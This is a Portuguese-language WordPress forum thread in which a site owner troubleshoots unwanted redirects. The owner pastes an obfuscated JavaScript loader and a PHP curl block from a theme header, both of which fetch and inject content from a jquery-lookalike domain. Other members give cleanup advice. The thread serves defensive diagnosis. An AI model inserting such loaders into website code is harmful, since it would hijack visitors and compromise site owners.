← WordPress

Vírus no WP

Lida 2267 vezes

Offline

afcramalho 
Membro
Mensagens 1373 Gostos 2
Feedback +4

Troféus totais: 34
Trófeus: (Ver todos)
Level 6 Linux User Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter

Boas. Tenho o site http://www.foradecena.com/ e tenho um problema, ao navegar no site ele de vez em quando re-encaminha para outros sites... tipo (http://www.games-iso.com/). Pesquisei e encontrei algum com o mesmo problema, mas não dizia a resolução, mas sei que o problema é deste código:

<script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script>

Que é detectado por sites como http://sitecheck.sucuri.net/ e também era o código que a outra pessoa que encontrei com o mesmo problema tinha no site dele. O problema é que não encontro o código em parte alguma do site para o eliminar... alguma dica?
Offline

andrevq 
Membro
Mensagens 294 Gostos 19
Troféus totais: 22
Trófeus: (Ver todos)
Level 5 Level 4 Seventh year Anniversary Sixth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 3 Level 2

Não estas a usar um plugin com o nome "Woo Custom Typography", se não vai a header.php na edição de temas, e vê se encontras lá esse código.
Offline

Celso Azevedo 
Membro
Mensagens 3500 Gostos 38
Feedback +12

Troféus totais: 30
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Se fostes atacado:

Primeiro tens que limpar o código, vê cada ficheiro do tema, procura por esse código ou algum código suspeito. Normalmente atacam o footer, header ou o functions, mas pode estar noutro lugar.

Depois era bom saber como é que inseriram o código para não voltarem a fazer o mesmo. Será que o tema tem algum problema? Será algum plugin desactualizado ou inseguro? Será o Wordpress? Ou é um outro site na mesma conta que está vulnerável?

Se não foste atacado:

Não será outro script? Tens um da hotwords no footer, aquilo é suposto fazer o quê?
Offline

Catalyst 
Membro
Mensagens 162 Gostos 1
Troféus totais: 16
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts

Esse tipo de códigos costumam é vir já nas templates.. foste meter-te em templates free e duvidosas dá nisso.
Offline

bayoo 
Membro
Mensagens 408 Gostos 75
Troféus totais: 24
Trófeus: (Ver todos)
Eighth year Anniversary Search Level 5 Seventh year Anniversary Windows User Super Combination Combination Topic Starter Level 4 Level 3

Cuidado que alguns templates (temas) são perigosos, além de trazerem backlinks, muitas vezes trazem código embutido que permite integrar código à distancia ou ficheiros que nada tem a ver com o wordpress mas que quem não tenha conhecimentos na matéria nem sabe distinguir.
É conveniente usar temas seguros e não alterar constantemente como muita gente faz, que acabam por criar confusões.
Offline

afcramalho 
Membro
Mensagens 1373 Gostos 2
Feedback +4

Troféus totais: 34
Trófeus: (Ver todos)
Level 6 Linux User Mobile User Apple User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter

Obrigado pelas respostas. Sim era problema da theme, esqueci-me de referir que foi alterada a pouco tempo, porque a anterior já estava à muitos anos e estava desatualizada em comparação a versão wordpress atual e por isso tive mesmo de fazer a alteração.

Descobri o código seguinte no header:

<?php
   if(function_exists('curl_init')){
      $url = "http://www.juquery.com/jquery-1.6.3.min.js";
         $ch = curl_init();
         $timeout = 10;
         curl_setopt($ch,CURLOPT_URL,$url);
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
         curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
      $data = curl_exec($ch);
   curl_close($ch);
echo "$data";
   }
?>

Segundo apurei era o que estava a causar o problema, mas vou analisar melhor a situação da theme para isto não ocorrer novamente. Obrigado pela ajuda a todos.